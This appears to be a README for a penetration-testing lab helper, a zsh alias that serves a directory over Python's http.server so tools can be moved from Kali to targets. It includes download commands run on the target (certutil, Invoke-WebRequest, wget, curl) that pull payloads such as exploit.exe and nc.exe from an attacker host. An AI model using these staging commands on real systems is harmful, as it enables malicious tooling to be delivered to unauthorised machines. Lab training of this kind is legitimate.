A minimal HTTP file transfer setup for penetration testing labs.

mbcyberworks/http-lab-setup

Quick HTTP Server for Penetration Testing Labs (Python)

A minimal HTTP file transfer setup for penetration testing labs.
Designed for reliable file delivery from Kali to targets in local labs and VPN-based environments (TryHackMe / HTB).

This setup prioritizes speed, simplicity, and reliability during lab and exam-style scenarios.


🎯 Use case

  • Deliver files from Kali to a target
  • Ideal for:
    • Payload delivery
    • Tool transfer
    • Script staging
  • Works for:
    • Local labs (virt-manager / NAT)
    • TryHackMe / HTB targets via VPN (tun0)
  • No authentication
  • No system-wide installs
  • Minimal noise and failure points

🧠 Design choices

  • Uses Python’s built-in http.server
  • Started via a shell alias (httpstart)
  • Server listens on 0.0.0.0 (all interfaces)
  • Shares only the current working directory (pwd)
  • Alias prints both LAN and VPN IPs for clarity
  • Intentionally unauthenticated for lab speed and simplicity

📦 One-time setup

No installation is required.

Python 3 is already present on Kali Linux.


🔧 Add alias to ~/.zshrc

Open your shell configuration:

nano ~/.zshrc

Add the following block:

# ===============================
# Quick HTTP Server (python)
# ===============================
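httpstart() {
  # Port to listen on; first argument, default 8000
  local PORT="${1:-8000}"

  local LANIP TUNIP
  # First address reported by the host (normally the LAN interface)
  LANIP="$(hostname -I | awk '{print $1}')"
  # IPv4 address of the VPN interface tun0; empty when the VPN is down
  TUNIP="$(ip -4 -o addr show dev tun0 2>/dev/null | awk '{print $4}' | cut -d/ -f1)"

  echo "[+] HTTP server starting"
  echo "    Directory : $(pwd)"
  # Print only the URLs for addresses that actually exist
  [[ -n "$LANIP" ]] && echo "    LAN       : http://$LANIP:$PORT/"
  [[ -n "$TUNIP" ]] && echo "    VPN       : http://$TUNIP:$PORT/"
  echo "    Stop with : CTRL+C"
  echo

  # Serves the current directory on all interfaces, without authentication
  python3 -m http.server "$PORT"
}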

Reload your shell:

source ~/.zshrc

🚀 Usage

Start HTTP server (default)

httpstart

Defaults

  • Port: 8000
  • Directory: current working directory (pwd)

Custom port

httpstart 8080

To serve a different directory, change into it before starting the server.


📂 What is shared?

Only the directory from which httpstart is executed.

Example:

~/loot/
├── linpeas.sh
├── exploit.exe
└── tools/
    └── nc.exe

Start the server:

cd ~/loot
httpstart

Available to the target:

http://<KALI_IP>:8000/linpeas.sh
http://<KALI_IP>:8000/exploit.exe
http://<KALI_IP>:8000/tools/nc.exe

Nothing outside this directory is exposed.
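
A pre-flight check for the directory that is about to be shared, added here as an example and not part of the repository: python3 -m http.server follows symbolic links, and the listener is unauthenticated on 0.0.0.0, so it helps to audit the directory before running httpstart. The function name http_exposure_audit and the list of sensitive file names are assumptions made for this example.

```shell
# Added example: audit a directory before serving it with httpstart.
# http_exposure_audit is a hypothetical helper, not part of the repository.
# The SENSITIVE-NAME patterns are an assumed starting list; adjust as needed.
http_exposure_audit() {
  local root findings link target hit
  # Resolve the directory to its physical path (no symlink components).
  root="$(cd "${1:-.}" 2>/dev/null && pwd -P)" || {
    echo "ERROR not a directory: ${1:-.}" >&2
    return 2
  }

  findings="$(
    # http.server follows symlinks, so a link whose target resolves
    # outside the served root exposes that target to every client.
    find "$root" -type l 2>/dev/null | while IFS= read -r link; do
      target="$(readlink -f "$link" 2>/dev/null)" || continue  # unresolvable
      case "$target" in
        "$root"|"$root"/*) ;;  # stays inside the served tree
        *) echo "ESCAPES-ROOT ${link#"$root"/} -> $target" ;;
      esac
    done

    # Names that usually do not belong on an unauthenticated listener
    # reachable from every interface, including the shared VPN.
    find "$root" \( -name .ssh -o -name .git -o -name .env \
        -o -name 'id_rsa*' -o -name 'id_ed25519*' \
        -o -name '*.ovpn' -o -name '*.kdbx' -o -name '.*_history' \) \
        2>/dev/null | while IFS= read -r hit; do
      echo "SENSITIVE-NAME ${hit#"$root"/}"
    done
  )"

  # Exit status: 0 = clean, 1 = findings printed, 2 = bad directory.
  [ -z "$findings" ] && return 0
  printf '%s\n' "$findings"
  return 1
}
```

Running `http_exposure_audit . && httpstart` starts the server only when the audit reports nothing.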


🪟 Windows target examples

PowerShell

Invoke-WebRequest http://<KALI_IP>:8000/file.exe -OutFile file.exe

Restricted environments

certutil -urlcache -f http://<KALI_IP>:8000/file.exe file.exe

🐧 Linux target examples

wget http://<KALI_IP>:8000/file

or:

curl -O http://<KALI_IP>:8000/file

🔌 Which IP should be used?

Local Windows VM

Use the LAN IP:

192.168.122.x

TryHackMe / HTB target

Use the VPN IP (tun0):

10.x.x.x
192.168.x.x

The server listens on all interfaces (0.0.0.0). The client must connect to an IP it can actually reach.


🧠 Penetration testing mindset

  • Prefer HTTP whenever a target can download files

  • Use FTP only when upload capability is required

  • Avoid shared folders and GUI copy/paste shortcuts

  • Choose transfer methods based on:

    • Routing
    • VPN reachability
    • Reliability
    • Target limitations

✅ Summary

  • Zero setup
  • One command (httpstart)
  • Shares only the current working directory
  • Clean, reliable, and low-noise
  • Ideal for VPN-based penetration testing labs
